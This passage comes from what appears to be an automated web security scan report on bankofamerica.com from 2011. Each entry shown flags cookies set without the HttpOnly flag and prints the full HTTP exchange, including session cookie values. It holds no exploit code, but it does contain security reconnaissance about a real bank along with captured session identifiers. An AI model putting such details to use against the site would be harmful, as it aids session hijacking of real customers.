The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ProcessUser.do?section=onlinebanking_enroll&adlink=000309029q890000g161 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; JSESSIONID=0000IQncNGlie79He7SZqIjFdOC:15bvh5047; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:47 GMT
Content-length: 0
Content-type: text/html
Location: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
Content-language: en-US
Set-cookie: JSESSIONID=0000Lh6TRorO-NKY7teHECejE7Y:12qtmh5cl; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Tue, 03 May 2011 12:23:47 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"


15.25. https://www.bankofamerica.com/credit-cards/cardoverview.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /credit-cards/cardoverview.action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /credit-cards/cardoverview.action?context_id=overview_page HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:47 GMT
Content-type: text/html;charset=UTF-8
Set-Cookie: SMIDENTITY=gR5vcd2T/9Pc8ggsnVIGFH2qS8UPe2InnEOKagmWCynRXczda87F4qQCcxXuFUHUslSW1KHy/MNQvuu5a0LFHQ+Yb+bXZGJG4jTdlo9tzaaaKPx3Pagvvtj1nZrTvP4C46pkodCH4CDcB/3rGd3UgOWOSL4lcJfCqsncm1lYr6e/ggBvgbwAsg3ni4IblWDlcCFGxK6jvqACOjfn31o65GuqLQK0WtCQcW/tfxLNdLJ638dCE54AhZ4CJ6m42FeUmuFs2SXlyGiAzf+yLMGl+4hznDezzrBb/w3+N6PBIomj/sT2UCohDEmUTPyi/ZkV4wm9V+sBOUDySiXavKZak292O/W0gh9tk4PU4ZYiGNpxKH6gw9tMSXhsc9r7Zp5pMJQd8kUkt6VJnO6g2Ef2bEAraf+WGZI5kQorViWkIFPPu+x0DweCzY+yWJ5folKswk4G/dYJP9N2U6ybWc8jHuQ6r20V37uYeqO878kY4Zp47DVGcyRzQZ4guLBaha65; path=/; domain=.bankofamerica.com; secure
Content-language: en-US
Set-cookie: JSESSIONID=0000zX4AQQUcvRQK0iSsbAUjzzb:12qb4k7c1; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="EN">
   <head>
       <link href="/www/en_US/stylesheet/cardsearch/creditcards_style.css" type="text/css"
   rel="styles
...[SNIP]...

15.26. https://www.bankofamerica.com/deposits/cds-iras.go  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /deposits/cds-iras.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/cds-iras.go?request_locale=en_US HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:46 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000WiNAyOMxZusl2j9h3aZNboI:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 53792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

15.27. https://www.bankofamerica.com/deposits/checking-accounts.go  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /deposits/checking-accounts.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/checking-accounts.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:48:28 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000Ns7qzV67h5K_rR84M2jM6vq:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 57115


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

15.28. https://www.bankofamerica.com/deposits/index.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /deposits/index.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /deposits/index.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:47:35 GMT
Content-length: 0
Content-type: text/html
Location: https://www.bankofamerica.com/deposits/resources/account-fees.go
Content-language: en-US
Set-cookie: JSESSIONID=0000Fx8Qo7FJ65Qz7Y_Hd97mF7Q:12rfueejl; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


15.29. https://www.bankofamerica.com/deposits/savings-accounts.go  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /deposits/savings-accounts.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/savings-accounts.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:44 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000bOFCpk8nTt8aoF-IeAOnvoo:15emvorhf; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 60652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

15.30. https://www.bankofamerica.com/deposits/special-programs/add-it-up.go  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /deposits/special-programs/add-it-up.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/special-programs/add-it-up.go?request_locale=en_US HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:46 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000ti0PA0mGuPOKot4gZ7LWh8g:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 44436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

15.31. https://www.bankofamerica.com/deposits/special-programs/keep-the-change.go  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /deposits/special-programs/keep-the-change.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/special-programs/keep-the-change.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:46 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000TQk9nyNVXhD3M3oMcJ_JRuk:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 48014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

15.32. https://www.bankofamerica.com/homepage/WidgetAction.go  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/WidgetAction.go

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /homepage/WidgetAction.go?requestType=display&divId=36094CED-7EDF-11DF-889C-00144F3EA4A4%2C360925D9-7EDF-11DF-889C-00144F3EA4A4%2C3608FEC5-7EDF-11DF-889C-00144F3EA4A4%2C36099B13-7EDF-11DF-889C-00144F3EA4A4&isWidget=true&targetedAdParams=%7B%7BmoduleId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CD3AAA0A1-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C18A00502-E390-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CB48EEC16-0060-11DF-B411-00144F25F968%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C3619DDB0-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-media-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D&previousPageId=3601F9E2-7EDF-11DF-889C-00144F3EA4A4&callback=jsonp1303820701740&_=1303820711776 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/homepage/overview.go
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; throttle_value=35; cmTPSet=Y; state=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:40:36 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000UmJOHI37nHLwr8Y5Et_eIFR:15bvh4t33; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4929

jsonp1303820701740({widgetdata:[{htmlsrc:'                                                     <!-- sm1.2one -->                                                        <div class="links-list-module">    <div class="column-co
...[SNIP]...

15.33. https://www.bankofamerica.com/homepage/overview.go  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/overview.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/overview.go HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35; cmTPSet=Y; cmRS=&t1=1303820662510&t2=1303820667589&t3=1303820694026&t4=1303820634257&lti=1303820694026&ln=&hr=javascript%3Adocument.stateSelectForm.submit%28%29%3B&fti=1303820694029&fn=state%20selector%20page_stateSelectForm%3A0%3B&ac=0:S&fd=0%3A3%3Astate%3B&uer=&fu=https%3A//www.bankofamerica.com/ProcessUser.do&pi=state%20selector%20page&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; state=MA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:24:50 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000dPG6ydQHxVjJLDzLY5rQEzC:157dm9o29; Path=/
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 47731


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

15.34. https://www.bankofamerica.com/homepage/stateSelect.go  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
